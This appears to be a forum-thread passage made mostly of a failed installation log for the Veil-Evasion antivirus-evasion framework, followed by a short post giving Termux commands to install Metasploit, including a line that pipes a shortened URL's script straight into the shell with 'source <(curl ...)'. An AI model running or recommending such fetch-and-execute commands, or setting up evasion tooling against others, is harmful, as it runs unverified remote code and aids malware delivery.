./build/lib.linux-x86_64-2.7/capstone/ppc_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sparc_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/xcore_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm64.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sysz_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/x86_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm64_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm.py -> /usr/local/lib/python2.7/dist-packages/capstone byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/ppc.py to ppc.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/mips_const.py to mips_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/x86.py to x86.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sparc.py to sparc.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/xcore.py to xcore.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/systemz.py to systemz.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/__init__.py to __init__.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/mips.py to mips.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/ppc_const.py to ppc_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sparc_const.py to sparc_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/xcore_const.py to xcore_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm64.py to arm64.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm_const.py to arm_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sysz_const.py to sysz_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/x86_const.py to x86_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm64_const.py to arm64_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm.py to arm.pyc running install_egg_info Removing /usr/local/lib/python2.7/dist-packages/capstone-3.0.egg-info Writing /usr/local/lib/python2.7/dist-packages/capstone-3.0.egg-info [*] Adding Capstone library path to: /etc/ld.so.conf.d/capstone.conf [*] Initializing Python dependencies installation... [*] Installing Python's SymmetricJSONRPC... [*] Installing SymmetricJSONRPC dependency (via PIP)... sudo: pip2: command not found [ERROR] Failed to install SymmetricJSONRPC... Exit code: 1 [*] Initializing (Wine) Python dependencies installation... [*] Preparing (Wine) Python directories... [*] Installing (Wine) Python... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install (Wine) Python 2.7.5... Exit code: 1 [*] Installing (Wine) Python dependencies... [*] Installing (Wine) Python's pywin32-219.win32-py2.7.exe... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install pywin32-219.win32-py2.7.exe... Exit code: 1 [*] Installing (Wine) Python's pycrypto-2.6.win32-py2.7.exe... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install pycrypto-2.6.win32-py2.7.exe... Exit code: 1 [*] Installing Python's PyInstaller [*] Installing Python's PEFile (For PyInstaller) sudo: wine: command not found [*] Installing Python's Futures (For PyInstaller) sudo: wine: command not found [*] Installing Python's setup tools sudo: wine: command not found [*] Initializing (Wine) Ruby dependencies installation... [*] Installing (Wine) Ruby & dependencies [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install (Wine) Ruby.exe... Exit code: 1 [*] Installing (Wine) Ruby OCRA gem... sudo: wine: command not found [ERROR] Failed to install (Wine) Ruby OCRA Gem... Exit code: 1 [*] Extracting (Wine) Ruby dependencies... [*] Initializing Go dependencies installation... Reading package lists... Done Building dependency tree Reading state information... Done The following additional packages will be installed: binutils cpp-5 g++-5 gcc-5 gcc-5-base gcc-6-base libasan2 libatomic1 libcc1-0 libcilkrts5 libgcc-5-dev libgcc1 libgfortran3 libgo7 libgomp1 libitm1 liblsan0 libmpx0 libquadmath0 libstdc++-5-dev libstdc++6 libtsan0 libubsan0 Suggested packages: binutils-doc gcc-5-locales g++-5-multilib gcc-5-doc libstdc++6-5-dbg gcc-5-multilib libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan2-dbg liblsan0-dbg libtsan0-dbg libubsan0-dbg libcilkrts5-dbg libmpx0-dbg libquadmath0-dbg gccgo-5-doc libgo7-dbg libstdc++-5-doc The following packages will be upgraded: binutils cpp-5 g++-5 gcc-5 gcc-5-base gcc-6-base gccgo-5 libasan2 libatomic1 libcc1-0 libcilkrts5 libgcc-5-dev libgcc1 libgfortran3 libgo7 libgomp1 libitm1 liblsan0 libmpx0 libquadmath0 libstdc++-5-dev libstdc++6 libtsan0 libubsan0 24 upgraded, 0 newly installed, 0 to remove and 1802 not upgraded. Need to get 53.7 MB of archives. After this operation, 10.0 MB of additional disk space will be used. WARNING: The following packages cannot be authenticated! gcc-6-base libgcc1 libstdc++6 libquadmath0 libgo7 gccgo-5 g++-5 gcc-5 cpp-5 libcc1-0 binutils libgomp1 libitm1 libatomic1 libasan2 liblsan0 libtsan0 libubsan0 libcilkrts5 libmpx0 libstdc++-5-dev libgcc-5-dev libgfortran3 gcc-5-base E: There were unauthenticated packages and -y was used without --allow-unauthenticated update-alternatives: error: no alternatives for go [*] Installing Go x86_64 (via TAR) [ERROR] Bad hash for go153x64.tar.gz! [*] Updating Veil-Framework configuration... [>] Please enter the path of your metasploit installation: /opt/metasploit-framework/ Veil-Framework configuration: [*] OPERATING_SYSTEM = Linux [*] TERMINAL_CLEAR = clear [*] WINEPREFIX = /home/nadhmi/.config/wine/veil/ [*] TEMP_DIR = /tmp/ [*] MSFVENOM_OPTIONS = [*] METASPLOIT_PATH = /opt/metasploit-framework//opt/metasploit-framework/ [*] MSFVENOM_PATH = /usr/bin/ [*] PYINSTALLER_PATH = /opt/veil/PyInstaller-3.2/ [*] VEIL_EVASION_PATH = /home/nadhmi/Veil-Evasion/ [*] PAYLOAD_SOURCE_PATH = /usr/share/veil-output/source/ [*] PAYLOAD_COMPILED_PATH = /usr/share/veil-output/compiled/ [*] GENERATE_HANDLER_SCRIPT = True [*] HANDLER_PATH = /usr/share/veil-output/handlers/ [*] HASH_LIST = /usr/share/veil-output/hashes.txt [*] VEIL_CATAPULT_PATH = /home/nadhmi/Veil-Catapult/ [*] CATAPULT_RESOURCE_PATH = /usr/share/veil-output/catapult/ Configuration File Written To '/etc/veil/settings.py' [*] Ensuring this account (nadhmi) owns veil output directory (/usr/share/veil-output)... [*] Ensuring this account (nadhmi) has correct ownership of /home/nadhmi/.config/wine/veil There was issues installing the following: Failed to install Wine... Exit code: 100 Veil Wine environment could not be found! Check for existence of /home/nadhmi/.config/wine/veil/drive_c Failed to install dependencies... Exit code: 100 Failed to install SymmetricJSONRPC... Exit code: 1 Failed to install (Wine) Python 2.7.5... Exit code: 1 Failed to install pywin32-219.win32-py2.7.exe... Exit code: 1 Failed to install pycrypto-2.6.win32-py2.7.exe... Exit code: 1 Failed to install (Wine) Ruby.exe... Exit code: 1 Failed to install (Wine) Ruby OCRA Gem... Exit code: 1 Bad hash for go153x64.tar.gz! [I] If you have any errors running Veil-Evasion, delete the Veil Wine profile ('rm -rf /home/nadhmi/.config/wine/veil') and re-run: '/home/nadhmi/Veil-Evasion/setup/setup.sh -c' [I] Done! root@nadhmi:/home/nadhmi/Veil-Evasion/setup#
Glatsh9020
pkg install wget wget https://github.com/gushmazuko/metasploit_in_termux/raw/master/metasploit.sh by chmod +x metasploit.sh ./metasploit.sh تثبيت سريع source <(curl -fsSL https://kutt.it/msf)